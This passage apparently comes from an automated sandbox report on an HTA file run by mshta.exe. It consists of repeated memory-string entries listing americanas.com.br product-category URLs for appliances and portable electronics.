00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/maquina-de-lavar?chave=pfm_hm_tt_1_0_maquin
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540213633.0000000005164000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/micro-ondas?chave=pfm_hm_tt_1_0_micro-ondas
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/pecas-para-eletrodomesticos
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548511611.000000000514A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540362597.0000000005146000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.0000000005140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=dk_hm_at_edom
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=dk_hm_at_edommeta.largemeta.large.hei
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540213633.0000000005164000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007B47000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=pfm_hm_tt_1_0_eletrodom
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=pfm_home_edom_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/aspirador-de-po?chave=pfm_hm_tt_1_0_aspirado
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/batedeira?chave=pfm_hm_tt_1_0_batedeira
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/bebedouro-e-purificador-de-agua/purificador-
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/cafeteira?chave=pfm_hm_tt_1_0_cafeteira
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/ferro-de-passar?chave=pfm_hm_tt_1_0_ferro-de
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535727062.000000000530E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/forno-eletrico?chave=pfm_hm_tt_1_0_forno-ele
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/fritadeira-eletrica?chave=pfm_hm_tt_1_0_frit
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/grill-e-sanduicheira?chave=pfm_hm_tt_1_0_gri
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535727062.000000000530E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/liquidificador?chave=pfm_hm_tt_1_0_liquidifi
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/maquina-de-costura?chave=pfm_hm_tt_1_0_maqui
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548679681.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/mixer?chave=pfm_hm_tt_1_0_mixer
Source: mshta.exe, 00000000.00000003.535457179.0000000005336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/mixer?chave=pfm_hm_tt_1_0_mixerhttps://www.a
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/processador-de-alimentos?chave=pfm_hm_tt_1_0
Source: mshta.exe, 00000000.00000003.538457983.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548280086.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540049421.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=dk_hm_at_eletroportateis
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=dk_hm_at_eletroportateismeta.largemeta
Source: mshta.exe, 00000000.00000003.535486328.0000000005344000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548679681.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=pfm_hm_tt_1_0_portateis
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535457179.0000000005336000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=pfm_home_portateis_menu
